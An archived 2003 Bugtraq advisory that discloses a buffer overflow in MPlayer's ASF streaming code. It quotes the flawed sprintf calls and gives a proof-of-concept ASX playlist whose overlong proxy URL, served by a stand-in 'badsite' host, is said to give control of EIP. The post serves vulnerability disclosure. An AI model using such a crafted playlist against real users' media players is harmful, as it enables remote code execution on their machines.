Home page logo
/

bugtraq logo Bugtraq mailing list archives

Mplayer Buffer Overflow
From: "Otero, Hernan" <hernan.otero () eds com>
Date: Thu, 25 Sep 2003 19:17:49 -0500


Favorite Linux Player Buffer Overflow
 

 Product:  Mplayer
 Developers:  http://www.mplayerhq.hu
 OS:    Port to All *NIX and Win32
 Remote Exploitable:  YES

Developers has been contacted, problem was fixed, recomended update your
mplayer version.

 In the source tree there is a file called asf_streaming.c this file has a
function named asf_http_request, that function has two buffer overflows,
this overflows are in the sprintf lines.
 
 
 asf_http_request {
                char str[250];
                ....
                ...
                ..
                sprintf( str, "Host: %s:%d", server_url->hostname,
 server_url->port );     
                ....
                ...     
                ..
                sprintf( str, "Host: %s:%d", url->hostname, url->port );
 
                ....
                ...
                ..
 }

 
  
 This, at a first look, may look as it can´t be exploited ( because the
MAXHOSTLEN size restriction )... but if in an ASX file like this with a
"badsite" listening in "badport" send "\n\n" as answer you could lead to a
fully controllable EIP buffer overflow
 
 
 <asx version = "3.0">
 <title>Bas Site ASX</title>
 
 <moreinfo href = "mailto:info () badsite com
 <mailto:info () badsite com> " />
 <logo href = "http://www.badsite.com/streaming/grupo.gif
 <http://www.badsite.com/streaming/grupo.gif> " style="ICON" />
 <banner href= "images/bannermitre.gif">
 <abstract>Bad Site live</abstract>
 <moreinfo target="_blank" href = "http://www.badsite.com/
 <http://www.badsite.com/> " />
 </banner>
 
 <entry>
 <title>NEWS</title>
 <AUTHOR>NEWS</AUTHOR>
 <COPYRIGHT>© All by the news</COPYRIGHT>
 <ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
 <logo href = "http://www.badsite.com/streaming/grupo.gif
 <http://badsite.com/streaming/grupo.gif> " style="ICON" />
 </entry>
 </asx>
 


 Regards,
 
   Hernán Otero
   hernan.otero () eds com 


  By Date           By Thread  

Current thread:
  • Mplayer Buffer Overflow Otero, Hernan (Sep 26)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]